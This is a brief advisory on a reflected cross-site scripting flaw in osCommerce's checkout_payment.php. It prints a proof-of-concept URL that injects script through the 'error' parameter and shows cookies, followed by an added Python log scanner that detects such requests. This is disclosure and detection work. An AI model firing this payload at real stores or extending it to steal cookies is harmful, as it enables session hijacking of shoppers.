OSCommerce Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability
There is no exploit required. The following example was submitted:

http://www.example.com/checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

Please note that the 'cc' value for 'payment_error' must be substituted with the name of a valid payment module.
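A log check for the request shape shown above, added here as an example and not part of the original advisory: it flags requests to checkout_payment.php whose decoded 'error' parameter contains an HTML tag. The log lines, the function names and the markup heuristic are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; line 2 carries the URL from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /checkout_payment.php'
    '?payment_error=cc&error=Invalid+card+number HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2005:10:00:05 +0000] "GET /checkout_payment.php'
    '?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert'
    '%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 5200',
    '192.0.2.12 - - [01/Jan/2005:10:00:09 +0000] "GET /index.php'
    '?error=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: a payment error message should never contain an HTML tag.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_error_param(target):
    """Return the decoded 'error' value if it carries markup, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/checkout_payment.php"):
        return None
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("error", []):
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_error_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = suspicious_error_param(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: markup in 'error' parameter: {value!r}")
```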